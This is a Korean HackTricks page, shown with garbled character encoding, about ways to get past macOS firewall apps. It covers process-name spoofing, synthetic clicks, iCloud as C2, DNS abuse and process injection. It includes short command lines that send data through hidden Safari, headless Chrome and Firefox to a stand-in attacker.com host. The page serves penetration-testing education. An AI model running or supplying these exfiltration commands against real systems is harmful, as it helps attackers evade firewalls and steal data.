macOS Bypassing Firewalls

HackTricks ์ง€์›

๋ฐœ๊ฒฌ๋œ ๊ธฐ์ˆ 

๋‹ค์Œ ๊ธฐ์ˆ ์€ ์ผ๋ถ€ macOS ๋ฐฉํ™”๋ฒฝ ์•ฑ์—์„œ ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์œผ๋กœ ํ™•์ธ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

ํ™”์ดํŠธ๋ฆฌ์ŠคํŠธ ์ด๋ฆ„ ๋‚จ์šฉ

  • ์˜ˆ๋ฅผ ๋“ค์–ด ์•…์„ฑ ์ฝ”๋“œ๋ฅผ **launchd**์™€ ๊ฐ™์€ ์ž˜ ์•Œ๋ ค์ง„ macOS ํ”„๋กœ์„ธ์Šค ์ด๋ฆ„์œผ๋กœ ๋ถ€๋ฅด๊ธฐ

ํ•ฉ์„ฑ ํด๋ฆญ

  • ๋ฐฉํ™”๋ฒฝ์ด ์‚ฌ์šฉ์ž์—๊ฒŒ ํ—ˆ๊ฐ€๋ฅผ ์š”์ฒญํ•˜๋ฉด ์•…์„ฑ ์ฝ”๋“œ๊ฐ€ ํ—ˆ์šฉ์„ ํด๋ฆญํ•˜๋„๋ก ํ•จ

Apple ์„œ๋ช…๋œ ์ด์ง„ ํŒŒ์ผ ์‚ฌ์šฉ

  • **curl**๊ณผ ๊ฐ™์€ ๊ฒƒ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ **whois**์™€ ๊ฐ™์€ ๋‹ค๋ฅธ ์ด์ง„ ํŒŒ์ผ๋„ ์‚ฌ์šฉ

์ž˜ ์•Œ๋ ค์ง„ ์• ํ”Œ ๋„๋ฉ”์ธ

๋ฐฉํ™”๋ฒฝ์ด apple.com ๋˜๋Š” **icloud.com**๊ณผ ๊ฐ™์€ ์ž˜ ์•Œ๋ ค์ง„ ์• ํ”Œ ๋„๋ฉ”์ธ์œผ๋กœ์˜ ์—ฐ๊ฒฐ์„ ํ—ˆ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  iCloud๋ฅผ C2๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ผ๋ฐ˜์ ์ธ ์šฐํšŒ

๋ฐฉํ™”๋ฒฝ ์šฐํšŒ๋ฅผ ์‹œ๋„ํ•˜๋Š” ๋ช‡ ๊ฐ€์ง€ ์•„์ด๋””์–ด

ํ—ˆ์šฉ๋œ ํŠธ๋ž˜ํ”ฝ ํ™•์ธ

ํ—ˆ์šฉ๋œ ํŠธ๋ž˜ํ”ฝ์„ ์•Œ๋ฉด ์ž ์žฌ์ ์œผ๋กœ ํ™”์ดํŠธ๋ฆฌ์ŠคํŠธ์— ๋“ฑ๋ก๋œ ๋„๋ฉ”์ธ์ด๋‚˜ ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์•ก์„ธ์Šคํ•  ์ˆ˜ ์žˆ๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‹๋ณ„ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค.

lsof -i TCP -sTCP:ESTABLISHED

DNS ๋‚จ์šฉ

DNS ํ•ด๊ฒฐ์€ ์•„๋งˆ๋„ DNS ์„œ๋ฒ„์— ์—ฐ๋ฝํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉ๋  ๊ฒƒ์œผ๋กœ ์˜ˆ์ƒ๋˜๋Š” mdnsreponder ์„œ๋ช…๋œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ํ†ตํ•ด ์ˆ˜ํ–‰๋ฉ๋‹ˆ๋‹ค.

๋ธŒ๋ผ์šฐ์ € ์•ฑ์„ ํ†ตํ•ด

  • oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • ๊ตฌ๊ธ€ ํฌ๋กฌ

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
  • ํŒŒ์ด์–ดํญ์Šค

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

ํ”„๋กœ์„ธ์Šค ์ธ์ ์…˜์„ ํ†ตํ•ด

๋งŒ์•ฝ ํ”„๋กœ์„ธ์Šค์— ์ฝ”๋“œ๋ฅผ ์ธ์ ์…˜ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์–ด๋–ค ์„œ๋ฒ„์— ์—ฐ๊ฒฐํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ๊ฐ€์ง„ ํ”„๋กœ์„ธ์Šค๋กœ ๋ฐฉํ™”๋ฒฝ ๋ณดํ˜ธ๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

macOS Process Abuse

์ฐธ๊ณ  ์ž๋ฃŒ

HackTricks ์ง€์›ํ•˜๊ธฐ

Last updated